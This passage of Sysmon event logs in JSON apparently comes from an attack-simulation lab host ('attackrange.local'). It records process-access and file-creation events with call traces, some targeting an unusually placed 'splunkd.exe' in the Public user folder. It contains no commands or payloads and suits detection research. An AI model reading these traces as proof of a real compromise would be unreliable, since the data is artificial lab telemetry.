C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:21.076","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.091\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.091","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:22.466\r\nProcessGuid: {E2A3D6B1-137C-5F25-0000-0010D1900F00}\r\nProcessId: 4748\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\128c-0\\System.ServiceModel.Activities.dll\r\nCreationUtcTime: 2020-08-01 07:02:22.451","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:22.466","ProcessGuid":"{E2A3D6B1-137C-5F25-0000-0010D1900F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\128c-0\\System.ServiceModel.Activities.dll","CreationUtcTime":"2020-08-01 07:02:22.451","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.529\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010D4980F00}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.529","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010D4980F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8558,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.529\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010D4980F00}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.529","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010D4980F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8559,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010D4980F00}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010D4980F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8560,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.591\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010CB9C0F00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.591","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010CB9C0F00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8561,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.591\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010CB9C0F00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:22.591","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010CB9C0F00}","TargetProcessId":"2544","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8562,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:22.591\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010CB9C0F00}\r\nTargetProcessId: 2544\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 